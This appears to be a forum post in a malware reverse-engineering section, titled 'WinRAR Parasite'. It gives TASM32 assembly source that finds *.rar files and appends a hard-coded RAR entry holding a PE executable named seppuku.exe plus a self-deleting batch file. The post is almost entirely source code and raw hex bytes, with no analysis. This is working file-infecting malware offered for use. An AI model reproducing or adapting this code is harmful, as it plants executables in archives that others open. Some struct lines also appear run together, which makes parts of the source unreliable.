Jump to content
Tuts 4 You

WinRAR Parasite

JMC31337

By JMC31337
in Malware Reverse Engineering

 Share

Recommended Posts

JMC31337

JMC31337

Posted
Posted (edited) 

;TASM32 /ml seppuku
;tlink32 -x -c -aa seppuku,,,import32
.386
.model flat,StdCall
jumps
include windows.inc
;==========================
FILETIME                        STRUC
        FT_dwLowDateTime        DD ?
        FT_dwHighDateTime       DD ?
FILETIME                        ENDS
MAX_PATH EQU 260
WIN32_FIND_DATA                 STRUC
        WFD_dwFileAttributes    DD ?
        WFD_ftCreationTime      FILETIME ?
        WFD_ftLastAccessTime    FILETIME ?
        WFD_ftLastWriteTime     FILETIME ?
        WFD_nFileSizeHigh       DD ?
        WFD_nFileSizeLow        DD ?
        WFD_dwReserved0         DD ?
        WFD_dwReserved1         DD ?        WFD_szseppuku          DB MAX_PATH DUP (?)
        WFD_szAlternateseppuku DB 13 DUP (?)                                DB 3 DUP (?)
WIN32_FIND_DATA                 ENDSFILE_ATTRIBUTE_ARCHIVE EQU 00000020h
FILE_ATTRIBUTE_NORMAL equ 080h
OPEN_EXISTING  equ 3
GENERIC_READ  equ 80000000h
GENERIC_WRITE  equ 40000000h
CREATE_ALWAYS   equ 2
OPEN_ALWAYS     equ 4
FILE_SHARE_WRITE EQU 00000002h
MB_YESNO equ 4
;===========================
 extrn FindFirstFileA:PROC
 extrn FindNextFileA:PROC
 extrn SetCurrentDirectoryA:PROC
 extrn ExitProcess:PROC
 extrn MessageBoxA:PROC
 extrn lstrcpy:PROC
 extrn GetFileSize:PROC
 extrn CreateFileA:PROC
 extrn CopyFileA:PROC
 extrn DeleteFileA:PROC
 extrn ShellExecuteA:PROC
 extrn CreateFileA:PROC
 extrn WriteFile:PROC
 extrn GlobalAlloc:PROC
 extrn SetFilePointer:PROC
 extrn CloseHandle:PROC
 extrn lstrlenA:PROC
 extrn SetFilePointer:PROC
;=============================
.data?
HostFile        db 260 dup (?)
WFD WIN32_FIND_DATA <?>
handl dd ?
byteswritten dd ?
handl2 dd ?
byteswritten2 dd ?.data
count db 0
caption    db "",0
logo       db "PARASITE A RAR FILE??",0
FileMask        db "*.rar",0RAR_end_header   db 00C4h,3Dh,7Bh,00h,40h,07h,00h
rar_end_len equ $-RAR_end_headerseppuku  db  "seppuku.bat",0
seppy db "del seppuku.exe"
      db 0Dh,0Ah
      db "del seppuku.bat",0  
sep_len equ $-seppy;FIRST LINE IS THE MAGIC BYTE SECTOR LINE==========================
seppuku2 db 0B7h,39h,74h,20h,90h,30h,00h,00h,20h,00h,00h,00h,20h,00h,00h,02h,95h,70h,1Ah,5Ah,0D3h
db 00ABh,0FAh,3Ch,14h,30h,0Bh,00h,20h,00h,00h,00h,73h,65h,70h,70h,75h,6Bh,75h,2Eh,45h,58h,45h,00h,0B0h
db 0A8h,78h,11h,4Dh,5Ah,50h,00h,02h,00h,00h,00h,04h,00h,0Fh,00h,0FFh,0FFh,00h,00h,0B8h,00h,00h,00h,00h
db 00h,00h,00h,40h,00h,1Ah,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,01h,00h,00h,0BAh,10h,00h,0Eh,1Fh
db 0B4h,09h,0CDh,21h,0B8h,01h,4Ch,0CDh,21h,90h,90h,54h,68h,69h,73h,20h,70h,72h,6Fh,67h,72h,61h,6Dh,20h
db 6Dh,75h,73h,74h,20h,62h,65h,20h,72h,75h,6Eh,20h,75h,6Eh,64h,65h,72h,20h,57h,69h,6Eh,33h,32h,0Dh
db 0Ah,24h,37h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,50h,45h,00h,00h,4Ch
db 01h,04h,00h,0FAh,3Ch,0D4h,0ABh,00h,00h,00h,00h,00h,00h,00h,00h,0E0h,00h,8Eh,81h,0Bh,01h,02h,19h,00h
db 02h,00h,00h,00h,16h,00h,00h,00h,00h,00h,00h,00h,10h,00h,00h,00h,10h,00h,00h,00h,20h,00h,00h,00h
db 00h,40h,00h,00h,10h,00h,00h,00h,02h,00h,00h,01h,00h,00h,00h,00h,00h,00h,00h,03h,00h,0Ah,00h,00h
db 00h,00h,00h,00h,60h,00h,00h,00h,04h,00h,00h,00h,00h,00h,00h,02h,00h,00h,00h,00h,00h,10h,00h,00h
db 20h,00h,00h,00h,00h,10h,00h,00h,10h,00h,00h,00h,00h,00h,00h,10h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,40h,00h,00h,0F8h,01h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,50h,00h,00h,58h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,43h,4Fh,44h,45h,00h,00h,00h,00h,00h,10h,00h,00h,00h,10h,00h,00h,00h,02h,00h,00h,00h
db 06h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,20h,00h,00h,60h,44h,41h,54h,41h,00h
db 00h,00h,00h,00h,20h,00h,00h,00h,20h,00h,00h,00h,12h,00h,00h,00h,08h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,40h,00h,00h,0C0h,2Eh,69h,64h,61h,74h,61h,00h,00h,00h,10h,00h,00h,00h
db 40h,00h,00h,00h,02h,00h,00h,00h,1Ah,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,40h
db 00h,00h,0C0h,2Eh,72h,65h,6Ch,6Fh,63h,00h,00h,00h,10h,00h,00h,00h,50h,00h,00h,00h,02h,00h,00h,00h
db 1Ch,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,40h,00h,00h,50h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,6Ah,00h,68h,80h,00h,00h,00h,6Ah,04h,6Ah,00h,6Ah,00h,68h,00h,00h,00h,0C0h,68h,25h,20h
db 40h,00h,0E8h,16h,01h,00h,00h,00A3h,0D0h,32h,40h,00h,6Ah,00h,6Ah,00h,6Ah,00h,0FFh,35h,0D0h,32h,40h,00h
db 0E8h,18h,01h,00h,00h,6Ah,00h,68h,0D4h,32h,40h,00h,6Ah,21h,68h,31h,20h,40h,00h,0FFh,35h,0D0h,32h,40h
db 00h,0E8h,05h,01h,00h,00h,0FFh,35h,00D0h,32h,40h,00h,0E8h,0C4h,00h,00h,00h,6Ah,04h,68h,01h,20h,40h,00h
db 68h,02h,20h,40h,00h,6Ah,00h,0E8h,0FFh,00h,00h,00h,83h,0F8h,06h,0Fh,85h,89h,00h,00h,00h,33h,0C0h,68h
db 90h,31h,40h,00h,68h,18h,20h,40h,00h,0E8h,0A9h,00h,00h,00h,0A3h,0D0h,32h,40h,00h,83h,3Dh,0D0h,32h,40h
db 00h,0FFh,74h,6Ah,90h,90h,90h,90h,6Ah,00h,68h,01h,20h,40h,00h,68h,0BCh,31h,40h,00h,6Ah,00h,0E8h,0C0h
db 00h,00h,00h,6Ah,00h,68h,80h,00h,00h,00h,6Ah,04h,6Ah,00h,6Ah,00h,68h,00h,00h,00h,0C0h,68h,0BCh,31h
db 40h,00h,0E8h,6Eh,00h,00h,00h,0A3h,0D8h,32h,40h,00h,6Ah,02h,6Ah,00h,6Ah,0F9h,0FFh,35h,0D8h,32h,40h,00h
db 0E8h,70h,00h,00h,00h,6Ah,00h,68h,0DCh,32h,40h,00h,68h,37h,10h,00h,00h,68h,52h,20h,40h,00h,0FFh,35h
db 0D8h,32h,40h,00h,0E8h,5Ah,00h,00h,00h,0EBh,03h,90h,90h,90h,6Ah,00h,6Ah,00h,6Ah,00h,68h,25h,20h,40h
db 00h,6Ah,00h,6Ah,00h,0E8h,5Fh,00h,00h,00h,0E8h,12h,00h,00h,00h,0FFh,25h,9Ch,40h,40h,00h,0FFh,25h,0A0h
db 40h,40h,00h,0FFh,25h,0A4h,40h,40h,00h,0FFh,25h,0A8h,40h,40h,00h,0FFh,25h,0ACh,40h,40h,00h,0FFh,25h,0B0h
db 40h,40h,00h,0FFh,25h,0B4h,40h,40h,00h,0FFh,25h,0B8h,40h,40h,00h,0FFh,25h,0BCh,40h,40h,00h,0FFh,25h,0C0h
db 40h,40h,00h,0FFh,25h,0C4h,40h,40h,00h,0FFh,25h,0C8h,40h,40h,00h,0FFh,25h,0CCh,40h,40h,00h,0FFh,25h,0D0h
db 40h,40h,00h,0FFh,25h,0D8h,40h,40h,00h,0FFh,25h,0E0h,40h,40h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,50h,41h,52h,41h,53h,49h,54h,45h,20h,41h,20h
db 52h,41h,52h,20h,46h,49h,4Ch,45h,3Fh,3Fh,00h,2Ah,2Eh,72h,61h,72h,00h,0C4h,3Dh,7Bh,00h,40h,07h,00h
db 73h,65h,70h,70h,75h,6Bh,75h,2Eh,62h,61h,74h,00h,64h,65h,6Ch,20h,73h,65h,70h,70h,75h,6Bh,75h,2Eh
db 65h,78h,65h,0Dh,0Ah,64h,65h,6Ch,20h,73h,65h,70h,70h,75h,6Bh,75h,2Eh,62h,61h,74h,00h,5Dh,9Dh,74h
db 20h,90h,30h,00h,00h,20h,00h,00h,00h,20h,00h,00h,02h,0E0h,26h,12h,44h,0Ah,0AAh,0F8h,3Ch,14h,30h,0Bh
db 00h,20h,00h,00h,00h,73h,65h,70h,70h,75h,6Bh,75h,2Eh,45h,58h,45h,00h,0F0h,3Ah,77h,30h,4Dh,5Ah,50h
db 00h,02h,00h,00h,00h,04h,00h,0Fh,00h,0FFh,0FFh,00h,00h,0B8h,00h,00h,00h,00h,00h,00h,00h,40h,00h,1Ah
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,01h,00h,00h,0BAh,10h,00h,0Eh,1Fh,0B4h,09h,0CDh,21h,0B8h,01h
db 4Ch,0CDh,21h,90h,90h,54h,68h,69h,73h,20h,70h,72h,6Fh,67h,72h,61h,6Dh,20h,6Dh,75h,73h,74h,20h,62h
db 65h,20h,72h,75h,6Eh,20h,75h,6Eh,64h,65h,72h,20h,57h,69h,6Eh,33h,32h,0Dh,0Ah,24h,37h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,50h,45h,00h,00h,4Ch,01h,04h,00h,0F8h,3Ch,2Eh
db 28h,00h,00h,00h,00h,00h,00h,00h,00h,0E0h,00h,8Eh,81h,0Bh,01h,02h,19h,00h,02h,00h,00h,00h,06h,00h
db 00h,00h,00h,00h,00h,00h,10h,00h,00h,00h,10h,00h,00h,00h,20h,00h,00h,00h,00h,40h,00h,00h,10h,00h
db 00h,00h,02h,00h,00h,01h,00h,00h,00h,00h,00h,00h,00h,03h,00h,0Ah,00h,00h,00h,00h,00h,00h,50h,00h
db 00h,00h,04h,00h,00h,00h,00h,00h,00h,02h,00h,00h,00h,00h,00h,10h,00h,00h,20h,00h,00h,00h,00h,10h
db 00h,00h,10h,00h,00h,00h,00h,00h,00h,10h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,30h,00h
db 00h,0F8h,01h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,40h,00h,00h,4Ch,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,43h,4Fh,44h
db 45h,00h,00h,00h,00h,00h,10h,00h,00h,00h,10h,00h,00h,00h,02h,00h,00h,00h,06h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,20h,00h,00h,60h,44h,41h,54h,41h,00h,00h,00h,00h,00h,10h,00h
db 00h,00h,20h,00h,00h,00h,02h,00h,00h,00h,08h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,40h,00h,00h,0C0h,2Eh,69h,64h,61h,74h,61h,00h,00h,00h,10h,00h,00h,00h,30h,00h,00h,00h,02h,00h
db 00h,00h,0Ah,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,40h,00h,00h,0C0h,2Eh,72h,65h
db 6Ch,6Fh,63h,00h,00h,00h,10h,00h,00h,00h,40h,00h,00h,00h,02h,00h,00h,00h,0Ch,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,40h,00h,00h,50h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,6Ah,00h,68h
db 80h,00h,00h,00h,6Ah,04h,6Ah,00h,6Ah,00h,68h,00h,00h,00h,0C0h,68h,25h,20h,40h,00h,0E8h,0C8h,00h,00h
db 00h,0A3h,98h,22h,40h,00h,6Ah,00h,6Ah,00h,6Ah,00h,0FFh,35h,98h,22h,40h,00h,0E8h,0CAh,00h,00h,00h,6Ah
db 00h,68h,9Ch,22h,40h,00h,6Ah,21h,68h,31h,20h,40h,00h,0FFh,35h,98h,22h,40h,00h,0E8h,0B7h,00h,00h,00h
db 0FFh,35h,98h,22h,40h,00h,0E8h,76h,00h,00h,00h,6Ah,04h,68h,01h,20h,40h,00h,68h,02h,20h,40h,00h,6Ah
db 00h,0E8h,0B1h,00h,00h,00h,83h,0F8h,06h,75h,3Fh,90h,90h,90h,90h,33h,0C0h,68h,58h,21h,40h,00h,68h,18h
db 20h,40h,00h,0E8h,5Bh,00h,00h,00h,0A3h,98h,22h,40h,00h,83h,3Dh,98h,22h,40h,00h,0FFh,74h,1Ch,90h,90h
db 90h,90h,6Ah,00h,68h,01h,20h,40h,00h,68h,84h,21h,40h,00h,6Ah,00h,0E8h,72h,00h,00h,00h,0EBh,03h,90h
db 90h,90h,6Ah,00h,6Ah,00h,6Ah,00h,68h,25h,20h,40h,00h,6Ah,00h,6Ah,00h,0E8h,5Fh,00h,00h,00h,0E8h,12h
db 00h,00h,00h,0FFh,25h,9Ch,30h,40h,00h,0FFh,25h,0A0h,30h,40h,00h,0FFh,25h,0A4h,30h,40h,00h,0FFh,25h,0A8h
db 30h,40h,00h,0FFh,25h,0ACh,30h,40h,00h,0FFh,25h,0B0h,30h,40h,00h,0FFh,25h,0B4h,30h,40h,00h,0FFh,25h,0B8h
db 30h,40h,00h,0FFh,25h,0BCh,30h,40h,00h,0FFh,25h,0C0h,30h,40h,00h,0FFh,25h,0C4h,30h,40h,00h,0FFh,25h,0C8h
db 30h,40h,00h,0FFh,25h,0CCh,30h,40h,00h,0FFh,25h,0D0h,30h,40h,00h,0FFh,25h,0D8h,30h,40h,00h,0FFh,25h,0E0h
db 30h,40h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
